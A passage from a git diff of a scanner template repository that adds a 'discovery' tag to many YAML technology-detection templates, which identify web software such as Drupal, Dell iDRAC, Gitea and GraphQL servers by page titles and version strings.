vendor: redhat product: enterprise_linux_server shodan-query: http.title:"Test Page for the Apache HTTP Server on Red Hat Enterprise Linux" - tags: tech,redhat + tags: tech,redhat,discovery http: - method: GET diff --git a/http/technologies/default-runcloud-page.yaml b/http/technologies/default-runcloud-page.yaml index a16194d0b8e..627008f0381 100644 --- a/http/technologies/default-runcloud-page.yaml +++ b/http/technologies/default-runcloud-page.yaml @@ -8,7 +8,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Welcome To RunCloud" - tags: tech,runcloud,default-page + tags: tech,runcloud,default-page,discovery http: - method: GET diff --git a/http/technologies/default-sitecore-page.yaml b/http/technologies/default-sitecore-page.yaml index f0b1fbd2772..9a7b0d488b2 100644 --- a/http/technologies/default-sitecore-page.yaml +++ b/http/technologies/default-sitecore-page.yaml @@ -16,7 +16,7 @@ info: vendor: sitecore product: experience_platform shodan-query: http.title:"Welcome to Sitecore" - tags: tech,sitecore,cms + tags: tech,sitecore,cms,discovery http: - method: GET diff --git a/http/technologies/default-ssltls-test-page.yaml b/http/technologies/default-ssltls-test-page.yaml index 7631abda486..3aa645a3cb3 100644 --- a/http/technologies/default-ssltls-test-page.yaml +++ b/http/technologies/default-ssltls-test-page.yaml @@ -11,7 +11,7 @@ info: vendor: apache product: http_server shodan-query: http.title:"Test Page for the SSL/TLS-aware Apache Installation on Web Site" - tags: tech,ssltls + tags: tech,ssltls,discovery http: - method: GET diff --git a/http/technologies/default-symfony-page.yaml b/http/technologies/default-symfony-page.yaml index 47019f0c986..1dbd17a47e2 100644 --- a/http/technologies/default-symfony-page.yaml +++ b/http/technologies/default-symfony-page.yaml @@ -12,7 +12,7 @@ info: vendor: sensiolabs product: symfony shodan-query: http.title:"Welcome to Symfony" - tags: tech,symfony,default-page + tags: tech,symfony,default-page,discovery http: - method: GET diff --git a/http/technologies/default-tengine-page.yaml b/http/technologies/default-tengine-page.yaml index f4496c02517..e1bb6cce56d 100644 --- a/http/technologies/default-tengine-page.yaml +++ b/http/technologies/default-tengine-page.yaml @@ -12,7 +12,7 @@ info: vendor: alibaba product: tengine shodan-query: http.title:"Welcome to tengine" - tags: tech,tengine,default-page + tags: tech,tengine,default-page,discovery http: - method: GET diff --git a/http/technologies/default-websphere-liberty.yaml b/http/technologies/default-websphere-liberty.yaml index 3ef5af1bc8d..d22f570a99e 100644 --- a/http/technologies/default-websphere-liberty.yaml +++ b/http/technologies/default-websphere-liberty.yaml @@ -12,7 +12,7 @@ info: vendor: ibm product: websphere_liberty shodan-query: http.title:"WebSphere Liberty" - tags: tech,websphere,liberty + tags: tech,websphere,liberty,discovery http: - method: GET diff --git a/http/technologies/dell/dell-dpi-panel.yaml b/http/technologies/dell/dell-dpi-panel.yaml index 074abaa0c22..3b88733e3cf 100644 --- a/http/technologies/dell/dell-dpi-panel.yaml +++ b/http/technologies/dell/dell-dpi-panel.yaml @@ -8,7 +8,7 @@ info: The Dell Metered Rack Power Distribution Unit distributes power to a server rack and are installed at the rear of a rack enclosure. metadata: max-request: 1 - tags: tech,dell,dpi,rpm + tags: tech,dell,dpi,rpm,discovery http: - method: GET diff --git a/http/technologies/dell/dell-idrac6-detect.yaml b/http/technologies/dell/dell-idrac6-detect.yaml index e18a9c96957..9278a9f22ab 100644 --- a/http/technologies/dell/dell-idrac6-detect.yaml +++ b/http/technologies/dell/dell-idrac6-detect.yaml @@ -7,7 +7,7 @@ info: description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. metadata: max-request: 1 - tags: tech,dell + tags: tech,dell,discovery http: - method: GET diff --git a/http/technologies/dell/dell-idrac7-detect.yaml b/http/technologies/dell/dell-idrac7-detect.yaml index 52e5413b62d..040a61677ad 100644 --- a/http/technologies/dell/dell-idrac7-detect.yaml +++ b/http/technologies/dell/dell-idrac7-detect.yaml @@ -7,7 +7,7 @@ info: description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. metadata: max-request: 1 - tags: tech,dell + tags: tech,dell,discovery http: - method: GET diff --git a/http/technologies/dell/dell-idrac8-detect.yaml b/http/technologies/dell/dell-idrac8-detect.yaml index 5255de20696..314c59246f3 100644 --- a/http/technologies/dell/dell-idrac8-detect.yaml +++ b/http/technologies/dell/dell-idrac8-detect.yaml @@ -9,7 +9,7 @@ info: metadata: max-request: 1 verified: true - tags: tech,dell,idrac + tags: tech,dell,idrac,discovery http: - method: GET diff --git a/http/technologies/dell/dell-idrac9-detect.yaml b/http/technologies/dell/dell-idrac9-detect.yaml index 415d9f1872e..19f56635052 100644 --- a/http/technologies/dell/dell-idrac9-detect.yaml +++ b/http/technologies/dell/dell-idrac9-detect.yaml @@ -7,7 +7,7 @@ info: description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. metadata: max-request: 1 - tags: tech,dell + tags: tech,dell,discovery http: - method: GET diff --git a/http/technologies/detect-sentry.yaml b/http/technologies/detect-sentry.yaml index e0729aec234..a2dac248f1b 100644 --- a/http/technologies/detect-sentry.yaml +++ b/http/technologies/detect-sentry.yaml @@ -9,7 +9,7 @@ info: - https://twitter.com/itsecurityguard/status/1127893545619218432?lang=en metadata: max-request: 1 - tags: ssrf,sentry,tech,hackerone + tags: ssrf,sentry,tech,hackerone,discovery http: - method: GET diff --git a/http/technologies/devexpress-detect.yaml b/http/technologies/devexpress-detect.yaml index 2a632969189..5211177920d 100644 --- a/http/technologies/devexpress-detect.yaml +++ b/http/technologies/devexpress-detect.yaml @@ -16,7 +16,7 @@ info: vendor: devexpress product: devexpress_components shodan-query: html:"DXR.axd" - tags: devexpress,iis,microsoft,asp,tech + tags: devexpress,iis,microsoft,asp,tech,discovery http: - method: GET diff --git a/http/technologies/directus-detect.yaml b/http/technologies/directus-detect.yaml index cf54e8aa5fd..8bfe6167199 100644 --- a/http/technologies/directus-detect.yaml +++ b/http/technologies/directus-detect.yaml @@ -16,7 +16,7 @@ info: vendor: monospace product: directus google-query: 'X-Powered-By: Directus' - tags: tech,directus,detect + tags: tech,directus,detect,discovery http: - method: GET diff --git a/http/technologies/dizquetv-detect.yaml b/http/technologies/dizquetv-detect.yaml index fcccaeed23a..633780a6f91 100644 --- a/http/technologies/dizquetv-detect.yaml +++ b/http/technologies/dizquetv-detect.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 fofa-query: icon_hash="775930718" - tags: dizquetv,tech,detect + tags: dizquetv,tech,detect,discovery http: - method: GET diff --git a/http/technologies/dkron-detect.yaml b/http/technologies/dkron-detect.yaml index c50e661318e..53840c4920d 100644 --- a/http/technologies/dkron-detect.yaml +++ b/http/technologies/dkron-detect.yaml @@ -12,7 +12,7 @@ info: verified: true fofa-query: title="DKRON" shodan-query: title:"DKRON" - tags: tech,dkron,detect + tags: tech,dkron,detect,discovery http: - method: GET diff --git a/http/technologies/docker-registry-browser-detect.yaml b/http/technologies/docker-registry-browser-detect.yaml index 9e6fc2b8d12..ebd76f921a5 100644 --- a/http/technologies/docker-registry-browser-detect.yaml +++ b/http/technologies/docker-registry-browser-detect.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: html:"Docker Registry Browser" - tags: docker,registry,browser,ui,tech + tags: docker,registry,browser,ui,tech,discovery http: - method: GET diff --git a/http/technologies/domibus-detect.yaml b/http/technologies/domibus-detect.yaml index 91639340230..f9623ef1cb4 100644 --- a/http/technologies/domibus-detect.yaml +++ b/http/technologies/domibus-detect.yaml @@ -1,37 +1,37 @@ -id: domibus-detect - -info: - name: Domibus - Detect - author: righettod - severity: info - description: | - Domibus was detected. - reference: - - https://ec.europa.eu/digital-building-blocks/sites/display/DIGITAL/Domibus - metadata: - verified: true - max-request: 1 - shodan-query: http.title:"Domibus" - tags: tech,domibus,detect - -http: - - method: GET - path: - - "{{BaseURL}}/domibus/rest/application/info" - - "{{BaseURL}}/domibus/" - - stop-at-first-match: true - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains_any(to_lower(body), "<title>domibus", "domibus-msh")' - condition: and - - extractors: - - type: regex - part: body - group: 1 - regex: +id: domibus-detect + +info: + name: Domibus - Detect + author: righettod + severity: info + description: | + Domibus was detected. + reference: + - https://ec.europa.eu/digital-building-blocks/sites/display/DIGITAL/Domibus + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"Domibus" + tags: tech,domibus,detect,discovery + +http: + - method: GET + path: + - "{{BaseURL}}/domibus/rest/application/info" + - "{{BaseURL}}/domibus/" + + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), "<title>domibus", "domibus-msh")' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: - '"versionNumber":\s*"([0-9.]+)"' # digest: 4b0a00483046022100a1703871f1c178a25f1603ba5266c229cddab52ef6044dd8d44075392541a3cd022100f4968502e06fa2e87d6d045ff62e3b2206c68cc1661c825d0f5fd50ceb447ad7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/dreambox-detect.yaml b/http/technologies/dreambox-detect.yaml index d08991f2bdf..50efc3491ba 100644 --- a/http/technologies/dreambox-detect.yaml +++ b/http/technologies/dreambox-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: dreambox,tech + tags: dreambox,tech,discovery http: - method: GET diff --git a/http/technologies/drupal-detect.yaml b/http/technologies/drupal-detect.yaml index 56ee36b7ef5..d2a03bde712 100644 --- a/http/technologies/drupal-detect.yaml +++ b/http/technologies/drupal-detect.yaml @@ -16,7 +16,7 @@ info: shodan-query: - http.component:"drupal" - cpe:"cpe:2.3:a:drupal:drupal" - tags: tech,drupal + tags: tech,drupal,discovery http: - method: GET diff --git a/http/technologies/dufs-detect.yaml b/http/technologies/dufs-detect.yaml index 355404008fd..2038e019125 100644 --- a/http/technologies/dufs-detect.yaml +++ b/http/technologies/dufs-detect.yaml @@ -1,36 +1,36 @@ -id: dufs-detect - -info: - name: DUFS - Detect - author: righettod - severity: info - description: | - DUFS software was detected. - reference: - - https://github.com/sigoden/dufs - metadata: - verified: true - max-request: 1 - shodan-query: http.html:"Dufs" - tags: tech,dufs,detect - -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains_all(to_lower(body), "__dufs_v", "allow_upload")' - condition: and - - extractors: - - type: regex - part: body - group: 1 - regex: +id: dufs-detect + +info: + name: DUFS - Detect + author: righettod + severity: info + description: | + DUFS software was detected. + reference: + - https://github.com/sigoden/dufs + metadata: + verified: true + max-request: 1 + shodan-query: http.html:"Dufs" + tags: tech,dufs,detect,discovery + +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_all(to_lower(body), "__dufs_v", "allow_upload")' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: - '(?i)__dufs_v([0-9.]+)_' # digest: 4a0a00473045022100a264e5df58f5b3e4630ac4b487ce16db1a1fe34ae773e72d332061de9efc29a302205710aee535bfcb87212af457117eae6dde1b398481c3d5456a4e0450dacd3cbe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/dwr-index-detect.yaml b/http/technologies/dwr-index-detect.yaml index a7ed01fd5cf..ea2f715850a 100644 --- a/http/technologies/dwr-index-detect.yaml +++ b/http/technologies/dwr-index-detect.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 1 google-query: intitle:"DWR Test Index" - tags: tech,misconfig,dwr + tags: tech,misconfig,dwr,discovery http: - method: GET diff --git a/http/technologies/ecology-detect.yaml b/http/technologies/ecology-detect.yaml index 20b5a2977c3..b668af04156 100644 --- a/http/technologies/ecology-detect.yaml +++ b/http/technologies/ecology-detect.yaml @@ -9,7 +9,7 @@ info: max-request: 1 shodan-query: ecology_JSessionid fofa-query: app="泛微-协同办公OA" - tags: ecology,tech + tags: ecology,tech,discovery http: - method: GET diff --git a/http/technologies/eg-manager-detect.yaml b/http/technologies/eg-manager-detect.yaml index de2c10fe9b9..d9e1b601813 100644 --- a/http/technologies/eg-manager-detect.yaml +++ b/http/technologies/eg-manager-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: tech,eg + tags: tech,eg,discovery http: - method: GET diff --git a/http/technologies/elasticsearch-sql-client-detect.yaml b/http/technologies/elasticsearch-sql-client-detect.yaml index 7422e042693..ef33b3f48c7 100644 --- a/http/technologies/elasticsearch-sql-client-detect.yaml +++ b/http/technologies/elasticsearch-sql-client-detect.yaml @@ -12,7 +12,7 @@ info: vendor: elastic product: elasticsearch shodan-query: http.title:"Elasticsearch-sql client" - tags: elasticsearch,tech,sql + tags: elasticsearch,tech,sql,discovery http: - method: GET diff --git a/http/technologies/element-web-detect.yaml b/http/technologies/element-web-detect.yaml index 2c2f8f4c76a..42b133998e4 100644 --- a/http/technologies/element-web-detect.yaml +++ b/http/technologies/element-web-detect.yaml @@ -13,7 +13,7 @@ info: vendor: matrix product: element shodan-query: html:"manifest.json" - tags: tech,matrix,element,detect + tags: tech,matrix,element,detect,discovery http: - method: GET diff --git a/http/technologies/elfinder-detect.yaml b/http/technologies/elfinder-detect.yaml index bdb2becd0b3..23d02ee4d1b 100644 --- a/http/technologies/elfinder-detect.yaml +++ b/http/technologies/elfinder-detect.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 2 - tags: tech,elfinder + tags: tech,elfinder,discovery http: - method: GET diff --git a/http/technologies/elfinder-version.yaml b/http/technologies/elfinder-version.yaml index 8d5c38ac15a..fe95adbf034 100644 --- a/http/technologies/elfinder-version.yaml +++ b/http/technologies/elfinder-version.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-77 metadata: max-request: 2 - tags: tech,elfinder,oss + tags: tech,elfinder,oss,discovery http: - method: GET diff --git a/http/technologies/empirecms-detect.yaml b/http/technologies/empirecms-detect.yaml index cd0063c18a7..c5b6e9bd475 100644 --- a/http/technologies/empirecms-detect.yaml +++ b/http/technologies/empirecms-detect.yaml @@ -11,7 +11,7 @@ info: vendor: phome product: empirecms shodan-query: http.html:EmpireCMS - tags: tech,empirecms + tags: tech,empirecms,discovery http: - method: GET diff --git a/http/technologies/emqx-detect.yaml b/http/technologies/emqx-detect.yaml index 831288d0d4b..28ffff2a11c 100644 --- a/http/technologies/emqx-detect.yaml +++ b/http/technologies/emqx-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: tech,emqx + tags: tech,emqx,discovery http: - method: GET diff --git a/http/technologies/enigma-nms-detect.yaml b/http/technologies/enigma-nms-detect.yaml index 9266e321351..089d72a0c26 100644 --- a/http/technologies/enigma-nms-detect.yaml +++ b/http/technologies/enigma-nms-detect.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: 'http.title:"ENIGMA NMS"' - tags: tech,enigma,nms,detection + tags: tech,enigma,nms,detection,discovery http: - method: GET diff --git a/http/technologies/erigon-server-detect.yaml b/http/technologies/erigon-server-detect.yaml index a28845c8579..c91aa6599a6 100644 --- a/http/technologies/erigon-server-detect.yaml +++ b/http/technologies/erigon-server-detect.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: product:"Erigon" - tags: tech,erigon,ethereum,web3,blockchain + tags: tech,erigon,ethereum,web3,blockchain,discovery http: - raw: diff --git a/http/technologies/erxes-detect.yaml b/http/technologies/erxes-detect.yaml index e17b43f5789..b401425873f 100644 --- a/http/technologies/erxes-detect.yaml +++ b/http/technologies/erxes-detect.yaml @@ -11,7 +11,7 @@ info: vendor: erxes fofa-query: title="erxes" google-query: intitle:"erxes" - tags: tech,erxes + tags: tech,erxes,discovery http: - method: GET diff --git a/http/technologies/express-default-page.yaml b/http/technologies/express-default-page.yaml index 31f736ec3c8..40c834752be 100644 --- a/http/technologies/express-default-page.yaml +++ b/http/technologies/express-default-page.yaml @@ -8,7 +8,7 @@ info: verified: true max-request: 1 shodan-query: html:"Welcome to Express" - tags: tech,express + tags: tech,express,discovery http: - method: GET diff --git a/http/technologies/eyesofnetwork-detect.yaml b/http/technologies/eyesofnetwork-detect.yaml index 3539dab1b66..193c40f877a 100644 --- a/http/technologies/eyesofnetwork-detect.yaml +++ b/http/technologies/eyesofnetwork-detect.yaml @@ -9,7 +9,7 @@ info: - https://www.eyesofnetwork.com/en metadata: max-request: 1 - tags: tech,cisa,eyesofnetwork + tags: tech,cisa,eyesofnetwork,discovery http: - method: GET diff --git a/http/technologies/fanruanoa-detect.yaml b/http/technologies/fanruanoa-detect.yaml index 5289a75307a..55af0be222f 100644 --- a/http/technologies/fanruanoa-detect.yaml +++ b/http/technologies/fanruanoa-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 2 - tags: oa,tech,dotnet,fanruan + tags: oa,tech,dotnet,fanruan,discovery http: - method: GET diff --git a/http/technologies/fanruanoa2012-detect.yaml b/http/technologies/fanruanoa2012-detect.yaml index fe3582b96fe..ecb738ee875 100644 --- a/http/technologies/fanruanoa2012-detect.yaml +++ b/http/technologies/fanruanoa2012-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: oa,java,fanruan,tech + tags: oa,java,fanruan,tech,discovery http: - method: GET diff --git a/http/technologies/fastjson-version.yaml b/http/technologies/fastjson-version.yaml index 69b2e1c922e..e3d23db5322 100644 --- a/http/technologies/fastjson-version.yaml +++ b/http/technologies/fastjson-version.yaml @@ -9,7 +9,7 @@ info: - https://blog.csdn.net/caiqiiqi/article/details/107907489 metadata: max-request: 1 - tags: fastjson,tech + tags: fastjson,tech,discovery http: - raw: diff --git a/http/technologies/favicon-detect.yaml b/http/technologies/favicon-detect.yaml index 42ae805a7f0..017f795cd46 100644 --- a/http/technologies/favicon-detect.yaml +++ b/http/technologies/favicon-detect.yaml @@ -12,7 +12,7 @@ info: - https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv metadata: max-request: 2 - tags: tech,favicon + tags: tech,favicon,discovery http: - method: GET diff --git a/http/technologies/fingerprinthub-web-fingerprints.yaml b/http/technologies/fingerprinthub-web-fingerprints.yaml index 84c023c6704..04d4eb2adda 100755 --- a/http/technologies/fingerprinthub-web-fingerprints.yaml +++ b/http/technologies/fingerprinthub-web-fingerprints.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: tech + tags: tech,discovery http: - method: GET diff --git a/http/technologies/flutter-web-detect.yaml b/http/technologies/flutter-web-detect.yaml index aea8497d1e7..9d412611b79 100644 --- a/http/technologies/flutter-web-detect.yaml +++ b/http/technologies/flutter-web-detect.yaml @@ -11,7 +11,7 @@ info: verified: true shodan-query: http.html:"flutter_bootstrap.js" fofa-query: body="flutter_bootstrap.js" - tags: tech,detect,flutter + tags: tech,detect,flutter,discovery http: - method: GET diff --git a/http/technologies/frappe-framework-detect.yaml b/http/technologies/frappe-framework-detect.yaml index fb66e09780e..3ced821baab 100644 --- a/http/technologies/frappe-framework-detect.yaml +++ b/http/technologies/frappe-framework-detect.yaml @@ -14,7 +14,7 @@ info: max-request: 1 verified: true shodan-query: http.html:"window.frappe" - tags: panel,frappe,detect + tags: panel,frappe,detect,discovery http: - method: GET diff --git a/http/technologies/froxlor-detect.yaml b/http/technologies/froxlor-detect.yaml index a233e28e865..87c460af5f8 100644 --- a/http/technologies/froxlor-detect.yaml +++ b/http/technologies/froxlor-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: tech,froxlor + tags: tech,froxlor,discovery http: - method: GET diff --git a/http/technologies/gabia-server-detect.yaml b/http/technologies/gabia-server-detect.yaml index 3e9c79ca285..4a4d78eeedd 100644 --- a/http/technologies/gabia-server-detect.yaml +++ b/http/technologies/gabia-server-detect.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: "Server: gabia" - tags: tech,gabia,detect + tags: tech,gabia,detect,discovery http: - method: GET diff --git a/http/technologies/geo-webserver-detect.yaml b/http/technologies/geo-webserver-detect.yaml index 5838c09aa45..4c589be993f 100644 --- a/http/technologies/geo-webserver-detect.yaml +++ b/http/technologies/geo-webserver-detect.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"GeoWebServer" - tags: panel,geowebserver,tech + tags: panel,geowebserver,tech,discovery http: - method: GET diff --git a/http/technologies/geth-server-detect.yaml b/http/technologies/geth-server-detect.yaml index 25bc81ce112..6a5018502ee 100644 --- a/http/technologies/geth-server-detect.yaml +++ b/http/technologies/geth-server-detect.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: product:"Geth" - tags: tech,geth,ethereum,web3,blockchain + tags: tech,geth,ethereum,web3,blockchain,discovery http: - raw: diff --git a/http/technologies/getsimple-cms-detect.yaml b/http/technologies/getsimple-cms-detect.yaml index a020160d360..e7a1f1361e3 100644 --- a/http/technologies/getsimple-cms-detect.yaml +++ b/http/technologies/getsimple-cms-detect.yaml @@ -7,7 +7,7 @@ info: description: Template to detect a running GetSimple CMS instance metadata: max-request: 2 - tags: tech,getsimple + tags: tech,getsimple,discovery http: - method: GET diff --git a/http/technologies/gilacms-detect.yaml b/http/technologies/gilacms-detect.yaml index 8e897ae2647..2d6aca16c75 100644 --- a/http/technologies/gilacms-detect.yaml +++ b/http/technologies/gilacms-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 2 - tags: tech,gilacms + tags: tech,gilacms,discovery http: - method: GET diff --git a/http/technologies/gitbook-detect.yaml b/http/technologies/gitbook-detect.yaml index 5e5a47d4626..8d245ca5efd 100644 --- a/http/technologies/gitbook-detect.yaml +++ b/http/technologies/gitbook-detect.yaml @@ -15,7 +15,7 @@ info: product: gitbook shodan-query: http.title:"gitbook" fofa-query: app="Introduction-GitBook" - tags: tech,gitbook + tags: tech,gitbook,discovery http: - method: GET diff --git a/http/technologies/gitea-detect.yaml b/http/technologies/gitea-detect.yaml index b16276554b7..53fb4f6531c 100644 --- a/http/technologies/gitea-detect.yaml +++ b/http/technologies/gitea-detect.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Gitea" - tags: tech,gitea + tags: tech,gitea,discovery http: - method: GET diff --git a/http/technologies/glpi-status-page.yaml b/http/technologies/glpi-status-page.yaml index 1bbd857c7ca..47d85074a0f 100644 --- a/http/technologies/glpi-status-page.yaml +++ b/http/technologies/glpi-status-page.yaml @@ -16,7 +16,7 @@ info: vendor: glpi-project product: glpi shodan-query: http.html:"glpi" - tags: tech,status,glpi + tags: tech,status,glpi,discovery http: - method: GET diff --git a/http/technologies/gnuboard-detect.yaml b/http/technologies/gnuboard-detect.yaml index 3996a696535..d4481b9a99b 100644 --- a/http/technologies/gnuboard-detect.yaml +++ b/http/technologies/gnuboard-detect.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: tech,gnuboard + tags: tech,gnuboard,discovery http: - method: GET diff --git a/http/technologies/goliath-detect.yaml b/http/technologies/goliath-detect.yaml index a6fab5da262..ad5e584afc1 100644 --- a/http/technologies/goliath-detect.yaml +++ b/http/technologies/goliath-detect.yaml @@ -16,7 +16,7 @@ info: vendor: goliath_project product: goliath shodan-query: 'Server: Goliath' - tags: tech,goliath + tags: tech,goliath,discovery http: - method: GET diff --git a/http/technologies/google-frontend-httpserver.yaml b/http/technologies/google-frontend-httpserver.yaml index e068c4e6448..7bc55d65122 100644 --- a/http/technologies/google-frontend-httpserver.yaml +++ b/http/technologies/google-frontend-httpserver.yaml @@ -8,7 +8,7 @@ info: verified: true max-request: 1 fofa-query: "Server: Google Frontend" - tags: tech,google,httpserver + tags: tech,google,httpserver,discovery http: - method: GET diff --git a/http/technologies/google/chromecast-detect.yaml b/http/technologies/google/chromecast-detect.yaml index 047af91f221..6529f8112b6 100644 --- a/http/technologies/google/chromecast-detect.yaml +++ b/http/technologies/google/chromecast-detect.yaml @@ -17,7 +17,7 @@ info: vendor: google product: chromecast shodan-query: Chromecast - tags: google,chromecast,detect + tags: google,chromecast,detect,discovery http: - raw: diff --git a/http/technologies/google/cloud-run-default-page.yaml b/http/technologies/google/cloud-run-default-page.yaml index fe1b312c0d1..c71097d61b9 100644 --- a/http/technologies/google/cloud-run-default-page.yaml +++ b/http/technologies/google/cloud-run-default-page.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: title:"Congratulations | Cloud Run" - tags: tech,cloudrun,google + tags: tech,cloudrun,google,discovery http: - method: GET diff --git a/http/technologies/google/firebase-detect.yaml b/http/technologies/google/firebase-detect.yaml index 8dc74d51fec..7f50560c4b5 100644 --- a/http/technologies/google/firebase-detect.yaml +++ b/http/technologies/google/firebase-detect.yaml @@ -8,7 +8,7 @@ info: - http://ghostlulz.com/google-exposed-firebase-database/ metadata: max-request: 1 - tags: tech,firebase + tags: tech,firebase,discovery http: - method: GET diff --git a/http/technologies/google/firebase-urls.yaml b/http/technologies/google/firebase-urls.yaml index 934b1b0cdaf..be643030171 100644 --- a/http/technologies/google/firebase-urls.yaml +++ b/http/technologies/google/firebase-urls.yaml @@ -7,7 +7,7 @@ info: description: Find firebaseio urls to check for security permissions metadata: max-request: 1 - tags: tech,firebase,google + tags: tech,firebase,google,discovery http: - method: GET diff --git a/http/technologies/google/google-bucket-service.yaml b/http/technologies/google/google-bucket-service.yaml index aa14c6a9af0..597b0359511 100644 --- a/http/technologies/google/google-bucket-service.yaml +++ b/http/technologies/google/google-bucket-service.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: google,tech,bucket + tags: google,tech,bucket,discovery http: - method: GET diff --git a/http/technologies/google/google-storage.yaml b/http/technologies/google/google-storage.yaml index dfe5e3dd0d1..05da25d4923 100644 --- a/http/technologies/google/google-storage.yaml +++ b/http/technologies/google/google-storage.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: tech,gstorage,google,bucket + tags: tech,gstorage,google,bucket,discovery http: - method: GET diff --git a/http/technologies/gotweb-detect.yaml b/http/technologies/gotweb-detect.yaml index 0af100917b3..3721501253c 100644 --- a/http/technologies/gotweb-detect.yaml +++ b/http/technologies/gotweb-detect.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 zoomeye-query: app="GotWeb" - tags: tech,got,gotweb + tags: tech,got,gotweb,discovery http: - method: GET diff --git a/http/technologies/gradio-detect.yaml b/http/technologies/gradio-detect.yaml index 44dd46936b2..668fd7da4ea 100644 --- a/http/technologies/gradio-detect.yaml +++ b/http/technologies/gradio-detect.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 fofa-query: "Gradio" - tags: gradio,tech,detect + tags: gradio,tech,detect,discovery http: - method: GET diff --git a/http/technologies/graphiql-detect.yaml b/http/technologies/graphiql-detect.yaml index 370ff5fe6f2..31b1d52e1ae 100644 --- a/http/technologies/graphiql-detect.yaml +++ b/http/technologies/graphiql-detect.yaml @@ -7,7 +7,7 @@ info: description: Detects the GraphiQL application metadata: max-request: 1 - tags: tech,graphiql,graphql + tags: tech,graphiql,graphql,discovery http: - method: GET diff --git a/http/technologies/graphql-detect.yaml b/http/technologies/graphql-detect.yaml index 0beedfe1ad9..7160e0f0314 100644 --- a/http/technologies/graphql-detect.yaml +++ b/http/technologies/graphql-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 124 - tags: tech,graphql + tags: tech,graphql,discovery http: - method: POST diff --git a/http/technologies/graphql/graphql-apiforwp-detect.yaml b/http/technologies/graphql/graphql-apiforwp-detect.yaml index 42183d220e8..94787b28fc7 100644 --- a/http/technologies/graphql/graphql-apiforwp-detect.yaml +++ b/http/technologies/graphql/graphql-apiforwp-detect.yaml @@ -4,7 +4,7 @@ info: author: princechaddha severity: info reference: https://github.com/dolevf/graphw00f/blob/main/graphw00f/lib.py - tags: tech,graphql,wordpress + tags: tech,graphql,wordpress,discovery http: - method: POST diff --git a/http/technologies/graphql/graphql-apollo-detect.yaml b/http/technologies/graphql/graphql-apollo-detect.yaml index 0aec16fece2..e32f7643007 100644 --- a/http/technologies/graphql/graphql-apollo-detect.yaml +++ b/http/technologies/graphql/graphql-apollo-detect.yaml @@ -4,7 +4,7 @@ info: author: princechaddha severity: info reference: https://github.com/dolevf/graphw00f/blob/main/graphw00f/lib.py - tags: tech,graphql,apollo + tags: tech,graphql,apollo,discovery http: - method: POST diff --git a/http/technologies/graphql/graphql-ariadne-detect.yaml b/http/technologies/graphql/graphql-ariadne-detect.yaml index f8401e2d691..99bf1cca5ee 100644 --- a/http/technologies/graphql/graphql-ariadne-detect.yaml +++ b/http/technologies/graphql/graphql-ariadne-detect.yaml @@ -4,7 +4,7 @@ info: author: princechaddha severity: info reference: https://github.com/dolevf/graphw00f/blob/main/graphw00f/lib.py - tags: tech,graphql,ariadne + tags: tech,graphql,ariadne,discovery http: - method: POST diff --git a/http/technologies/graphql/graphql-dianajl-detect.yaml b/http/technologies/graphql/graphql-dianajl-detect.yaml index 66409f8281f..68b9b618fa5 100644 --- a/http/technologies/graphql/graphql-dianajl-detect.yaml +++ b/http/technologies/graphql/graphql-dianajl-detect.yaml @@ -4,7 +4,7 @@ info: author: princechaddha severity: info reference: https://github.com/dolevf/graphw00f/blob/main/graphw00f/lib.py - tags: tech,graphql,dianajl + tags: tech,graphql,dianajl,discovery http: - method: POST diff --git a/http/technologies/graphql/graphql-flutter-detect.yaml b/http/technologies/graphql/graphql-flutter-detect.yaml index db4bf2c20bd..15d4935c041 100644 --- 